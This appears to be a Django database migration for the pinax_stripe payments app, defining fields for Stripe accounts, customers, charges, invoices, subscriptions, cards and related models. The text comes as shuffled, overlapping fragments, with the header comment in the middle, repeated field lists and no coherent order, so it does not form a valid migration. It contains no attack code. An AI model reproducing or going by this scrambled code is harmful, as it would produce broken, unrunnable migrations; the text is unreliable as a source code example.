('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted',", "max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True,", "max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True,", "), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers',", "max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off',", "jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ]", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField(", "('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender',", "('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)),", "models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True,", "('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True,", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "}, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message',", "('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided',", "('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')),", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[", "import Decimal from django.conf import settings from django.db import migrations, models import django.db.models.deletion", "('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)),", "models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False,", "max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)),", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description',", "'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True,", "max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, },", "null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract':", "= [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent',", "('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)),", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)),", "('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE,", "max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year',", "models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax',", "('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ],", "('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key',", "name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL),", "('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()),", "models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True,", "name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance',", "('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor',", "null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled',", "('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={", "models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4',", "('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2,", "models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)),", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid',", "models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2,", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True,", "models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country',", "('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days',", "models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts',", "model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan', unique_together=set([('stripe_id',", "= True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[", "('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True,", "models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')),", "django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import", "models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)),", "models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()),", "('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)),", "null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False,", "models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end',", "('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={", "('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month',", "('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ],", "('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts',", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False,", "False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True,", "to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem',", "models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7,", "models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)),", "null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user',", "False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False,", "('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)),", "('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)),", "null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False,", "options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description',", "related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField(", "('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()),", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd',", "] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)),", "Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from decimal import Decimal", "models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code',", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[", "('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon',", "serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count',", "null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)),", "}, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)),", "('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge',", "}, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)),", "name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name',", "null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed',", "models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ),", "models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True,", "('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message',", "related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False,", "models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)),", "models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description',", "('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts',", "False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE,", "migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True,", "null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True,", "models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial =", "('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ],", "models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')),", "('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()),", "('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()),", "models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total',", "max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)),", "django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "-*- coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06 19:00 from", "False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()),", "models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, 